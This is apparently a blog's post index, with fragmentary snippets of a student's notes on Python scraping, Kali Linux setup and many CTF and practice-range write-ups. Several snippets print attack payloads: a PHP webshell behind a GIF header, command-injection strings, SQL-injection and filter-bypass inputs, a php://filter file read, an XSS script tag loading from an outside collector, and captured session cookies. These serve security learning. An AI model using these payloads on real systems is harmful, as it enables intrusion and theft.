algae

原创 【MOOC昊天】Python网络爬虫与信息提取 课件+代码（全）

@TOC【第O周】网络爬虫之前奏【第一周】网络爬虫之规则单元1：Requests库入门import requestsr = requests.get("http://www.baidu.com")print( r.status_code, #请求状态码，200访问成功， type(r), r.headers, sep='\n')200<class ‘requests.models.Response’>{‘Cache-Con

原创 2020最新：Github下载资源慢？失败？下载速度降到0? 无法下载 release？

网上大部分方案不是已经失效了就是不好用太麻烦修改hosts文件码云clone云云点开即达我珍藏的网址下载速度超快可下release无广告在此也非常非常非常感谢这位作者所做出的伟大贡献！！！...

原创 【Kali Linux 2020.1b】 全网 最新 安装 教程 ——你会踩到的坑，遇到的问题，难以哭诉的崩溃

有很人多说：本人擅长Ai、Fw、Fl、Br、Ae、Pr、Id、Ps等软件的安装与卸载，精通CSS、JavaScript、PHP、ASP、C、C＋＋、C#、Java、Ruby、Perl、Lisp、python、Objective-C、ActionScript、Pascal、spss、sas等单词的拼写，熟悉Windows、Linux、Mac、Android、IOS、WP8等系统的开关机。但是没...

原创 【pikachu渗透靶场&Web安全从入门到放弃】之 burp suite 暴力破解原理和测试流程

2.2-1 暴力破解原理和测试流程(Av96582332,P2)暴力破解漏洞解析-目录l暴力破解攻击 暴力破解漏洞概述l暴力破解漏洞测试流程l基于表单的暴力破解攻击（基于 burp suitel暴力破解之不安全的验证码分析---on client---on serverlToken 可以防暴力破解吗？l暴力...

原创 【pikachu皮卡丘渗透测试靶场】远程命令、代码执行漏洞原理及案例演示

37.6-1 远程命令、代码执行漏洞原理及案例演示(Av96582332,P37)RCE(remote command/code execute)概述 RCE漏洞，可以让攻击者直接向后台服务器远程注入操作系统命令或者代码，从而控制后台系统。 远程系统命令执行 一般出现这种漏洞，是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口...

原创 小破站【pikachu 皮卡丘渗透靶场】 之 SQL注入 自学全套笔记

sql.txt大纲数字型测试：$id=$_POST['id']select 字段1，字段2 from 表名 where id = 1 or 1=1;字符型测试：$uname=$_GET['username']select 字段1，字段2 from 表名 where username='kobe' or 1=1#';搜索型测试：like '%%'...

原创 【墨者学院】SQL手工注入漏洞测试全过程(MySQL数据库)

原创 【攻防世界 XCTF】 WEB 高手进阶 baby_web

攻防世界 XCTF WEB 高手进阶 baby_web

原创 OffSec Labs Proving grounds Play——Gaara

[Gaara: 1 ~ VulnHub](https://www.vulnhub.com/entry/gaara-1,629/)writeup walkthroughEnumerationEnumerate the web application for a username.FootholdBrute-force the SSH service. You can get away with a smaller wordlist if it's the right one.Privile

原创 OffSec Labs Proving grounds Play——FunboxEasyEnum

FunboxEasyEnum writeup walkthrough[Funbox： EasyEnum ~ VulnHub](https://www.vulnhub.com/entry/funbox-easyenum,565/)**Enumeration**Brute-force the web server's files and directories. Be sure to check for common file extensions.**Remote Code Execution

原创 【Bugku】秋名山老司机 详细题解 Writeup

import requestsimport reurl = 'http://123.206.87.240:8002/qiumingshan/'s = requests.Session()req = s.get(url)expression = re.search(r'(\d+[+\-*])+(\d+)', req.text).group()# expression = req.text[req.text.find('<div>')+5:req.text.find('=?')]re

原创 大一 计算机应用基础 进制转换

ASCII0 48A 65a 972B 8O 10D 16HBIN%o 八进制输出 OCT%d 十进制输出 DEC%#X 16进制大写输出 HEX （比如 i = 10，输出小写a，如果是X, 输出大写 X（%#x 16进制小写输出）@@@ 十进制0@@ 八进制0x@ 16进制除n(要转化的进制)倒取余数法2的4次方，就是4个二进制位，才能表示16进制（16种状态）1个分4个三个一分段1个分三个3 00115 01018.

原创 Hello！我的大学生活学习指南

勤学似春起之苗,不见其增,日有所长;辍学如磨刀之石,不见其损,日有所亏。一、实用电脑小技巧：二、想以赛促学，提升自己：辍学如磨刀之石,不见其损,日有所亏。)一、实用电脑小技巧：tampermonkey 游览器插件（免广告观看，豆瓣搜电影视频，电子书，etc）百度云资源搜索软件下载二、想以赛促学，提升自己：1.直接学python2.对网络攻防CTF、AWD感兴趣的：针对CTF，大家都是怎么训练的？bilibili搜索ctf得到的教程视频sql注入照下文的几个方向来自我提升CTF

原创 小黑客，2020还没有邀请码注册 hackthebox ？reCAPTCHA验证码加载不出来？

访问邀请码页面https://www.hackthebox.eu/invite F12控制台输入$.post('https://www.hackthebox.eu/api/invite/generate',function(data){console.log(data)})点开出现的数据提交 xxxxxx= 经过base64解码后的字符串开始注册The g-recaptcha-response field is required.使用了谷歌的reCAPTCHA验证码，在国内不能

原创 码云 gitee 下载压缩包 未知文件格式 解压错误？像极了 Github

未知文件格式xxx-master.zip）。上面是火狐、Chrome游览器的下载被迅雷接管下面换用其他游览器，比如qq游览器

原创 最新版 Kali 2020.3 高DPI 缩放，桌面文字太小怎么调？

HiDPI（每英寸高点）显示启动Kali Linux后，某些东西（Windows /按钮或文本/字体）可能看起来比预期的要小。这可能是因为HiDPI（又名High DPI）。这完全取决于所讨论的软件及其制造方式（例如GTK2，GTK3，Qt5等）。这可能是由于各种原因而发生的，例如图形卡驱动程序和/或监视器配置文件。如果事情看起来更大的比你会相信什么是“正常”，请参阅我们的固定DPI指南。本指南将介绍单屏设置。我们没有为了测试多个显示输出而编写指南的硬件。因此，我们正在寻求社区的帮助。如果您具有硬件和

原创 【BUUCTF】[GXYCTF2019] Ping Ping Ping 总结笔记 Writeup

【BUUCTF】[GXYCTF2019]Ping Ping Ping Writeup0x00 考点1、命令绕过空格方法有：2、内联执行0x01 解题1、简单变量替换，用a覆盖拼接flag2、变量ab互换传递，绕过字符串匹配，实现拼接3、内联执行4、被过滤的bash，用管道+sh替换0x00 考点1、命令绕过空格方法有：$IFS$1、${IFS}$1、 {IFS}、IFS2、内联执行内联，就是将反引号内命令的输出作为输入执行?ip=127.0.0.1;cat$IFS$9`ls`$IFS在Li

原创 【BUUCTF】[极客大挑战 2019] PHP 清晰易懂详细总结 Writeup

【BUUCTF】[极客大挑战 2019] PHP Writeup0x00 考点目录扫描源码泄露反序列化0x01 解题0x00 考点目录扫描源码泄露反序列化0x01 解题dirsearch-u 指定url-e 指定网站语言-w 可以加上自己的字典（加上路径）-r 递归跑（查到一个目录后，在目录后重复跑，很慢，不建议用）python3 dirsearch.py -u http://26e0c1d7-d98e-4a34-9ffe-901887297fb5.node3.buuoj.cn

原创 【BUUCTF】[极客大挑战 2019] Upload Writeup

【BUUCTF】[极客大挑战 2019] Upload Writeup0x00 考点文件上传绕过可解析的php后缀名：0x01 解题0x00 考点文件上传绕过带图片头的php一句话木马可解析的php后缀名：php3，php4，php5，pht，phtml,phps,pht，phtm0x01 解题要求必须上传图片带gif图片头的php一句话木马GIF89a? <script language="php">eval($_REQUEST[a])</script&g

原创 【BUUCTF】 [极客大挑战2019] BabySQL —— 清晰易懂总结好的 Writeup

【BUUCTF】 [极客大挑战2019] BabySQL Writeup0x00 考点sql 注入 双写绕过0x01 解题爆库爆表爆列0x00 考点sql 注入 双写绕过replace函数，找到union和select等替换为空双写绕过，单词中间拆开，分两半，里面藏一个完整的：union ununionionselectseselectlectfromfrfromomwherewhwhereere（过滤了or）informationinfoorrmation常见UR

原创 【BUUCTF】 [极客大挑战 2019] Http Writeup —— CTFer必须要会的几种请求头添加方式

【BUUCTF】 [极客大挑战 2019] Http Writeup0x00 考点请求头请求头添加的方式0x01 解题1、ModHeader2、Hackbar3、Burp Suite操作内容总结)0x00 考点请求头User-Agent：用什么游览器访问Referer ：当前页面是通过此来源页面里的链接进入的X-Forwarded-For：获取最初发起请求客户端的IP地址请求头添加的方式HackbarModHeaderBurp Suite游览器 手动加cookie0x01

原创 新版抓包神器 Burp Suite 2020 找不到 spider模块？

0x00 官方说明在官网文档https://portswigger.net/support/burp-suite-tools点击Scanner 和Spider 出现的页面都是相同的https://portswigger.net/burp/documentation/desktop/scanningScanner 原先主要作用是扫描web漏洞0x01 简单看看0x03 Spider 使用教程比如我找网站的bak文件需要一段时间，把整个目录都爬下来，非常直观0x02 Scan

原创 dirmap + dirsearch 安装和使用教程

0x00 安装运行报错一个一个模块安装很麻烦，看看dirmap给的requirement.txtgeventrequestsprogressbar2lxml直接pip3 install -r requirement.txt愉快的开始0x01 使用

原创 【BUUCTF】[ACTF2020 新生赛] BackupFile Writeup

@TOC0x00 知识点0x01 解题

原创 【BUUCTF】[ACTF2020 新生赛]Exec Writeup

|cat /flag标记{f40182a0-6749-43f2-b223-9651bf2ef2d0}

原创 【BUUCTF】[极客大挑战 2019]Knife Writeup

flag{bbfff7f8-7c63-4dc2-bd28-64a75585d2cf}

原创 【BUUCTF】[ACTF2020 新生赛] IncludeWriteup

【BUUCTF】[ACTF2020 新生赛]Include0x00 知识点0x01 解题0x00 知识点0x01 解题?file=php://filter/read=convert.base64-encode/resource=flag.phpPD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOw

原创 除了csdn网站打不开，一直刷新等待没反应，其他网站都能正常访问

DNS错误自动获取DNS服务器地址清除DNS缓存信息ipconfig /flushdns

原创 【BUUCTF】[极客大挑战 2019] Secret File Writeup

<html> <title>secret</title> <meta charset="UTF-8"><?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stris...

原创 Kali Linux 安装靶场 docker 源 又卡又慢

1cat /etc/docker/daemon.json2{ "registry-mirrors": [ "https://registry.docker-cn.com", "http://hub-mirror.c.163.com", "https://docker.mirrors.ustc.edu.cn" ]}

原创 Kali Linux 2020.3 最新版壁纸 —— 那些好看你又苦苦寻找的黑客壁纸

链接：https://pan.baidu.com/s/1sPQnupSTgYXFTXmAwmk6DQ提取码：smmf

原创 fatal: 无法访问 ‘https://github.com/c0ny1/vulstudy.git/‘：Could not resolve host: github.com

正克隆到 ‘vulstudy’… fatal: 无法访问‘https://github.com/c0ny1/vulstudy.git/’：Could not resolve host:github.com执行：git config --global --unset http.proxy或git config --global --unset https.proxy

原创 向虚拟机 Kali Linux 传文件的方法

一、VMware tools 最简单 最方便直接拖拽，还可以直接复制粘贴文本二、设置权限，创建共享文件夹三、找到ip，用 Xftp 等传输工具连接

原创 【ti0sCTF】靶场平台新体验

Webti0s{6745d556-aab0-082d-7f52-6c40b749f148}Flag{W0_sH1_JI0_ed}发现？既然不能做，那就放几道题给大家看一下MiscCryptoJXUyNjY5JXUyNjZDJXUyNjZDJUI2JXUyMDE2JXUyMDE2JXUyNjY5JXUyNjZCJXUyNjZCJXUyNjZBJXUyMDE2JXUyMjJFJXUyMDE2JXUyNjZDJXUyMDE2JUE3JXUyNjZDJXUyNjY5JXU.

原创 Kali Linux 2020.02 最新版问题

之前手动安过一次，图省事，又安了Kali Linux 2020.2 VM版

原创 cmd + Cmder 命令行 使用教程技巧 （全攻略）

Windows cmd cmder 命令窗口 使用小技巧 爽到起飞！！！一、cmd1、注意与其他程序快捷键的区别２、常用命令二、cmder０、基础配置安装1、把 Cmder 文件位置加到系统环境变量2、添加 cmder 到右键菜单：一、cmd1、注意与其他程序快捷键的区别Ctrl + A 是全选整个页面右键属性打开快速编辑模式你就可以左键拖动，选中文字（相当于Ctrl+M 标记），在需要的地方右键（即Ctrl+V粘贴）命令行中撤销和剪切 Ctrl + Z/X 都无效２、常用命令输

原创 Python 入门基础 必会必知

注释1单行注释# 这是一个注释2多行注释 三单引号'''这是多行注释，用三个单引号这是多行注释，用三个单引号 这是多行注释，用三个单引号'''3多行注释 三双引号 """"""这是多行注释，用三个双引号这是多行注释，用三个双引号 这是多行注释，用三个双引号"""...

原创 【CTF】SQL 注入 总结

思路技巧常见URL编码#%23工具sqlmap绕过

原创 【封神台 - 掌控安全靶场】尤里的复仇 Ⅰ 小芳！一二三四五六七章

【封神台 - 掌控安全靶场】尤里的复仇 小芳！第五章：进击！拿到Web最高权限！【配套课时：绕过防护上传木马实战演练】（等级：15）<script src = https：//xsspt.com/nxqPZY？1597410463> </ script>cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP

原创 木马

图片马cmd命令行copy 1.png/b + 2.php/a 3.png/b：二进制文件 /a:ASCII文件3.png生成文件名